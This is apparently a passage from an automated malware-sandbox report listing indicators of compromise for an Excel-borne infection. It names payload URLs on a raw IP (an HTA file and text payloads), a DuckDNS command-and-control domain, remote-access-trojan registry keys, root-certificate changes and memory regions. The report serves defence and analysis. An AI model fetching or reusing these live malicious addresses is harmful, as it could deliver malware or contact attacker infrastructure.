http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
192.3.193.155
 malicious
http://192.3.193.155/xampp/boz/REDS.txt
192.3.193.155
 malicious
cloudsave.duckdns.org
malicious
http://192.3.193.155
unknown
https://zhort.de/pitash4
unknown
https://zhort.de/pitash0
unknown
http://ocsp.entrust.net03
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EB
unknown
https://contoso.com/License
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://zhort.de/(c5
unknown
https://zhort.de/pitash8i
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEB
unknown
http://go.micros
unknown
https://zhort.de/pitash
88.99.66.38
http://geoplugin.net/json.gp/C
unknown
http://geoplugin.net/json.gpSf
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.193.155/=VEB
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta6
unknown
http://192.3.193.155/9VEB
unknown
http://ocsp.entrust.net0D
unknown
https://zhort.de/inG
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWS
unknown
http://go.cr
unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFp
unknown
http://nuget.org/NuGet.exe
unknown
https://zhort.de/pitash;f
unknown
http://crl.entrust.net/server1.crl0
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwor
unknown
https://zhort.de//r
unknown
https://contoso.com/Icon
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC:
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC:
unknown
https://zhort.de/E3
unknown
https://zhort.de/t
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://geoplugin.net/json.gpjf
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://zhort.de/pitashta
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htak
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EB
unknown
http://192.3.193.155/xampp/boz/w
unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$
unknown
https://zhort.de/pitashzWEB
unknown
https://zhort.de/pitashvWEB
unknown
http://192.3.193.155/
unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089
unknown
https://secure.comodo.com/CPS0
unknown
https://zhort.de/
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 50 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cloudsave.duckdns.org
192.3.64.135
 malicious
ia803104.us.archive.org
207.241.232.154
 malicious
zhort.de
88.99.66.38
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
192.3.64.135
cloudsave.duckdns.org
United States
malicious
207.241.232.154
ia803104.us.archive.org
United States
malicious
192.3.193.155
unknown
United States
malicious
88.99.66.38
zhort.de
Germany
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%j0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2820B
2820B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
r0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\318CE
318CE
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31AA2
31AA2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\323D5
323D5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31AA2
31AA2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 83 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
511000
heap
page read and write
 malicious
631000
heap
page read and write
 malicious
12F3D000
trusted library allocation
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
615000
heap
page read and write
 malicious
1C39D000
stack
page read and write
7FE898CB000
trusted library allocation
page read and write
26F1000
trusted library allocation
page read and write
3633000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89A6C000
trusted library allocation
page read and write
1B560000
heap
page read and write
130000
heap
page read and write
1B4B2000
heap
page read and write
1C54A000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
6276000
heap
page read and write
3D10000
heap
page read and write
4A70000
heap
page read and write
7FE89B85000
trusted library allocation
page read and write
6223000
heap
page read and write
1C53A000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
2A9E000
stack
page read and write
1A98A000
stack
page read and write
38DB000
stack
page read and write
490000
direct allocation
page read and write
639D000
heap
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
3B5D000
trusted library allocation
page read and write
57A000
heap
page read and write
1C7AB000
stack
page read and write
2AFA000
trusted library allocation
page read and write
1ACFA000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
1B6D0000
heap
page read and write
4D98000
heap
page read and write
3B5A000
trusted library allocation
page read and write
2C5000
stack
page read and write
1E0000
trusted library allocation
page read and write
3E06000
heap
page read and write
1B3F8000
heap
page read and write
3171000
trusted library allocation
page read and write
7FE89996000
trusted library allocation
page execute and read and write
360000
trusted library allocation
page read and write
300000
heap
page read and write
317D000
trusted library allocation
page read and write
29F4000
trusted library allocation
page read and write
7FE89C06000
trusted library allocation
page read and write
1C10E000
stack
page read and write
3834000
heap
page read and write
1A5AE000
heap
page execute and read and write
7FE89C10000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
3DC2000
heap
page read and write
1AB3D000
stack
page read and write
4BD1000
heap
page read and write
2310000
heap
page read and write
1AD7C000
heap
page read and write
131E0000
trusted library allocation
page read and write
3530000
heap
page read and write
1A6C9000
heap
page read and write
3DD1000
heap
page read and write
1D30000
heap
page read and write
1B0CE000
stack
page read and write
4D99000
heap
page read and write
210000
heap
page read and write
374000
heap
page read and write
3D2000
heap
page read and write
368000
heap
page read and write
4EF000
heap
page read and write
1AE000
heap
page read and write
200000
heap
page read and write
4650000
heap
page read and write
26FF000
trusted library allocation
page read and write
3FD000
heap
page read and write
4AA9000
heap
page read and write
35BB000
heap
page read and write
3DE5000
heap
page read and write
1C2000
heap
page read and write
12668000
trusted library allocation
page read and write
2A6000
heap
page read and write
7FE89C0A000
trusted library allocation
page read and write
4DA8000
heap
page read and write
1C2BA000
heap
page read and write
3DE5000
heap
page read and write
2F8D000
stack
page read and write
3DB2000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
10000
heap
page read and write
1B60000
heap
page read and write
1F00000
direct allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
4D5F000
heap
page read and write
3DBE000
heap
page read and write
2A9000
heap
page read and write
1CA7E000
stack
page read and write
1FA000
heap
page read and write
1AFA4000
heap
page read and write
3640000
heap
page read and write
7FE89A67000
trusted library allocation
page read and write
10000
heap
page read and write
46D0000
heap
page read and write
2361000
trusted library allocation
page read and write
39E0000
trusted library allocation
page read and write
56F000
heap
page read and write
1C8000
heap
page read and write
69F000
heap
page read and write
1C3D5000
heap
page read and write
3843000
heap
page read and write
27BE000
trusted library allocation
page read and write
4DCC000
heap
page read and write
2E2000
heap
page read and write
7FE89946000
trusted library allocation
page read and write
3812000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
270000
heap
page read and write
5031000
heap
page read and write
47D0000
trusted library allocation
page read and write
3040000
remote allocation
page read and write
1F60000
direct allocation
page read and write
1AE20000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
7FE89882000
trusted library allocation
page read and write
3740000
trusted library allocation
page read and write
20000
heap
page read and write
459000
heap
page read and write
46E4000
heap
page read and write
382C000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
6436000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
1CE0000
direct allocation
page read and write
3059000
trusted library allocation
page read and write
7FE89A42000
trusted library allocation
page read and write
46E1000
heap
page read and write
377A000
trusted library allocation
page read and write
2E1000
heap
page read and write
400000
heap
page read and write
7FE898A4000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE89A74000
trusted library allocation
page read and write
626A000
heap
page read and write
4FD9000
heap
page read and write
3182000
trusted library allocation
page read and write
5026000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
BE0000
heap
page read and write
1C60000
heap
page read and write
3175000
trusted library allocation
page read and write
2CDE000
stack
page read and write
3B2000
heap
page read and write
2650000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
46E1000
heap
page read and write
4879000
heap
page read and write
2BF000
heap
page read and write
327A000
trusted library allocation
page read and write
2AC000
heap
page read and write
270000
heap
page read and write
16B000
heap
page read and write
1B1FE000
stack
page read and write
354D000
heap
page read and write
1A548000
heap
page execute and read and write
4890000
heap
page read and write
1C2000
heap
page read and write
2B3000
heap
page read and write
535000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
587000
heap
page read and write
4C1A000
heap
page read and write
2EA000
heap
page read and write
4DCC000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4D46000
heap
page read and write
1BA000
heap
page read and write
274000
heap
page read and write
633E000
heap
page read and write
377A000
trusted library allocation
page read and write
1C2CB000
heap
page read and write
3276000
trusted library allocation
page read and write
550000
heap
page read and write
1AF7F000
stack
page read and write
663000
heap
page read and write
3DD4000
heap
page read and write
3275000
trusted library allocation
page read and write
4A7000
heap
page read and write
4DAF000
heap
page read and write
264F000
stack
page read and write
1A670000
heap
page read and write
3C8F000
stack
page read and write
2A7B000
heap
page read and write
2F4000
heap
page read and write
631B000
heap
page read and write
7FE89893000
trusted library allocation
page read and write
1A91F000
stack
page read and write
3DA8000
heap
page read and write
1B140000
heap
page read and write
48BF000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
2D7000
heap
page read and write
123EF000
trusted library allocation
page read and write
4C2B000
heap
page read and write
51B000
heap
page read and write
1D0000
heap
page read and write
22F0000
heap
page execute and read and write
2AB1000
trusted library allocation
page read and write
44D000
heap
page read and write
1C220000
heap
page read and write
1A8D9000
stack
page read and write
48C9000
heap
page read and write
210000
trusted library allocation
page read and write
4C26000
heap
page read and write
7FE89873000
trusted library allocation
page execute and read and write
3DBF000
heap
page read and write
2EE000
heap
page read and write
330000
heap
page read and write
48CA000
heap
page read and write
38EE000
trusted library allocation
page read and write
3FA000
heap
page read and write
7FE89A37000
trusted library allocation
page read and write
418E000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
45EF000
stack
page read and write
2A67000
trusted library allocation
page read and write
614000
heap
page read and write
48B8000
heap
page read and write
484000
heap
page read and write
24E1000
trusted library allocation
page read and write
16F000
heap
page read and write
20D000
stack
page read and write
478000
remote allocation
page execute and read and write
7FE89B30000
trusted library allocation
page read and write
4F5000
heap
page read and write
4C37000
heap
page read and write
4D62000
heap
page read and write
1B3BF000
stack
page read and write
535000
heap
page read and write
7FE89B95000
trusted library allocation
page read and write
1AC88000
stack
page read and write
7FE8992C000
trusted library allocation
page execute and read and write
1AE000
heap
page read and write
327B000
trusted library allocation
page read and write
35B000
heap
page read and write
4B0000
heap
page read and write
4D63000
heap
page read and write
1AD4E000
stack
page read and write
1C53E000
stack
page read and write
63CC000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
51AA000
heap
page read and write
40E000
heap
page read and write
35B9000
heap
page read and write
6407000
heap
page read and write
7FFFFF85000
trusted library allocation
page execute read
3DE3000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
1C153000
heap
page read and write
2310000
heap
page read and write
1C8BF000
stack
page read and write
359000
heap
page read and write
355F000
heap
page read and write
3FD000
heap
page read and write
3B0A000
trusted library allocation
page read and write
44A0000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
2B21000
trusted library allocation
page read and write
160000
heap
page read and write
3182000
trusted library allocation
page read and write
1B5CB000
heap
page read and write
2B2E000
trusted library allocation
page read and write
1B5F5000
heap
page read and write
194000
heap
page read and write
124F1000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89BA5000
trusted library allocation
page read and write
128E5000
trusted library allocation
page read and write
3DB6000
heap
page read and write
472000
heap
page read and write
55F000
heap
page read and write
1AE50000
heap
page read and write
4DA6000
heap
page read and write
22F4000
heap
page execute and read and write
3C70000
trusted library allocation
page read and write
4D3000
heap
page read and write
1AE26000
heap
page read and write
293000
heap
page read and write
3182000
trusted library allocation
page read and write
2421000
trusted library allocation
page read and write
4A9000
heap
page read and write
1C810000
heap
page read and write
593000
heap
page read and write
445000
heap
page read and write
207000
heap
page read and write
377A000
trusted library allocation
page read and write
1A650000
heap
page read and write
F2E000
stack
page read and write
1B5D3000
heap
page read and write
1D6000
heap
page read and write
35D5000
heap
page read and write
1BA000
heap
page read and write
21B000
heap
page read and write
3DEF000
heap
page read and write
3DDA000
heap
page read and write
4B2000
heap
page read and write
535000
heap
page read and write
134DD000
trusted library allocation
page read and write
381E000
heap
page read and write
3B5D000
trusted library allocation
page read and write
7FE898EC000
trusted library allocation
page execute and read and write
3E06000
heap
page read and write
42D000
heap
page read and write
4DAA000
heap
page read and write
1CDF000
direct allocation
page read and write
3BF000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
430E000
stack
page read and write
10000
heap
page read and write
35C1000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
1F0000
heap
page read and write
432E000
stack
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
38BE000
stack
page read and write
1FA0000
direct allocation
page read and write
377A000
trusted library allocation
page read and write
12421000
trusted library allocation
page read and write
4DCC000
heap
page read and write
3268000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
2E0000
heap
page read and write
23E1000
trusted library allocation
page read and write
7FE898C0000
trusted library allocation
page read and write
6385000
heap
page read and write
1309E000
trusted library allocation
page read and write
1BE6000
heap
page read and write
3B5D000
trusted library allocation
page read and write
262000
heap
page read and write
2563000
trusted library allocation
page read and write
3B4000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
139000
heap
page read and write
4C2D000
heap
page read and write
317F000
trusted library allocation
page read and write
48BF000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
287E000
trusted library allocation
page read and write
4070000
heap
page read and write
48B6000
heap
page read and write
1E2000
heap
page read and write
1B6000
heap
page read and write
1D50000
heap
page read and write
430000
trusted library allocation
page read and write
7FE89A94000
trusted library allocation
page read and write
51A000
heap
page read and write
243E000
trusted library allocation
page read and write
7FE89883000
trusted library allocation
page read and write
2D45000
heap
page read and write
7FE89A63000
trusted library allocation
page read and write
3D2E000
stack
page read and write
401000
heap
page read and write
7FE89966000
trusted library allocation
page read and write
1A64D000
stack
page read and write
6356000
heap
page read and write
60F000
stack
page read and write
7FE89C00000
trusted library allocation
page read and write
10000
heap
page read and write
1A6FD000
heap
page read and write
7FE89A2C000
trusted library allocation
page read and write
2AFA000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
3D48000
heap
page read and write
48C9000
heap
page read and write
4480000
trusted library allocation
page read and write
1A521000
heap
page read and write
3E7A000
stack
page read and write
389000
heap
page read and write
3268000
trusted library allocation
page read and write
20000
heap
page read and write
4866000
heap
page read and write
42DF000
stack
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
374A000
stack
page read and write
470000
direct allocation
page read and write
4930000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
2E5000
heap
page read and write
4EE000
heap
page read and write
1C773000
heap
page read and write
13464000
trusted library allocation
page read and write
1A6B7000
heap
page read and write
40E000
heap
page read and write
3900000
heap
page read and write
1D10000
heap
page read and write
7FE898B3000
trusted library allocation
page execute and read and write
7FE89970000
trusted library allocation
page execute and read and write
20000
heap
page read and write
274000
heap
page read and write
377A000
trusted library allocation
page read and write
407000
heap
page read and write
134000
heap
page read and write
2E4000
heap
page read and write
62E0000
heap
page read and write
3185000
trusted library allocation
page read and write
4890000
heap
page read and write
481C000
heap
page read and write
486B000
heap
page read and write
3DDA000
heap
page read and write
1C90000
trusted library allocation
page read and write
1C50F000
stack
page read and write
504000
heap
page read and write
40EE000
stack
page read and write
4887000
heap
page read and write
1E0000
trusted library allocation
page read and write
3D5000
heap
page read and write
7FE89960000
trusted library allocation
page read and write
1A726000
heap
page read and write
4C3C000
heap
page read and write
555000
heap
page read and write
1A96F000
stack
page read and write
5F7000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
2960000
trusted library allocation
page read and write
481C000
heap
page read and write
4DCC000
heap
page read and write
1C544000
heap
page read and write
7FFFFF89000
trusted library allocation
page execute read
3A9000
heap
page read and write
317A000
trusted library allocation
page read and write
338000
heap
page read and write
481C000
heap
page read and write
4879000
heap
page read and write
4D7000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
1C290000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
6247000
heap
page read and write
1A9EC000
heap
page read and write
3D8D000
heap
page read and write
22F8000
heap
page execute and read and write
7FE89A70000
trusted library allocation
page execute and read and write
2820000
heap
page read and write
1A87E000
heap
page execute and read and write
264000
heap
page read and write
1D0000
heap
page read and write
63D8000
heap
page read and write
1B611000
heap
page read and write
6217000
heap
page read and write
48CA000
heap
page read and write
3075000
trusted library allocation
page read and write
30D000
heap
page read and write
5031000
heap
page read and write
7FE89A98000
trusted library allocation
page read and write
126000
heap
page read and write
2C0000
heap
page read and write
400000
trusted library allocation
page read and write
47F5000
heap
page read and write
51C000
heap
page read and write
3085000
trusted library allocation
page read and write
2474000
trusted library allocation
page read and write
378000
heap
page read and write
290000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1D10000
heap
page read and write
1ADDF000
stack
page read and write
1A920000
heap
page read and write
3182000
trusted library allocation
page read and write
4E7000
heap
page read and write
1B220000
heap
page read and write
5169000
heap
page read and write
1A709000
stack
page read and write
3B5A000
trusted library allocation
page read and write
4D67000
heap
page read and write
3AA0000
trusted library allocation
page read and write
46E2000
heap
page read and write
12460000
trusted library allocation
page read and write
3F5000
heap
page read and write
2BF000
heap
page read and write
4485000
trusted library allocation
page read and write
2F3000
heap
page read and write
63C0000
heap
page read and write
29A5000
trusted library allocation
page read and write
1B62F000
heap
page read and write
51F000
heap
page read and write
7FE898AB000
trusted library allocation
page read and write
1C389000
heap
page read and write
474000
remote allocation
page execute and read and write
1D70000
heap
page read and write
4C7D000
heap
page read and write
5176000
heap
page read and write
46DC000
heap
page read and write
48B1000
heap
page read and write
3F6A000
trusted library allocation
page read and write
4D69000
heap
page read and write
4AA9000
heap
page read and write
46D8000
heap
page read and write
1A50C000
stack
page read and write
259000
heap
page read and write
1B220000
heap
page read and write
3B5A000
trusted library allocation
page read and write
28E3000
trusted library allocation
page read and write
1B176000
heap
page read and write
1E2000
heap
page read and write
517A000
heap
page read and write
29A7000
trusted library allocation
page read and write
206000
heap
page read and write
398000
heap
page read and write
1EEF000
stack
page read and write
2C24000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
423000
heap
page read and write
430000
direct allocation
page read and write
7FE898BD000
trusted library allocation
page execute and read and write
7FE89894000
trusted library allocation
page read and write
245F000
trusted library allocation
page read and write
279000
heap
page read and write
4BD0000
heap
page read and write
4DAA000
heap
page read and write
4887000
heap
page read and write
2A1000
heap
page read and write
37A1000
heap
page read and write
3EA000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
46D1000
heap
page read and write
7FE89C38000
trusted library allocation
page read and write
1D86000
heap
page read and write
169000
heap
page read and write
227000
heap
page read and write
1A976000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
424000
heap
page read and write
43F000
heap
page read and write
7FE89A12000
trusted library allocation
page read and write
1C410000
heap
page read and write
438000
heap
page read and write
7FFFFF84000
trusted library allocation
page readonly
407000
heap
page read and write
1A540000
heap
page execute and read and write
7FE89AC0000
trusted library allocation
page read and write
1C25C000
stack
page read and write
21D0000
heap
page read and write
3274000
trusted library allocation
page read and write
1A97E000
heap
page read and write
3040000
remote allocation
page read and write
4FD9000
heap
page read and write
496000
heap
page read and write
142000
heap
page read and write
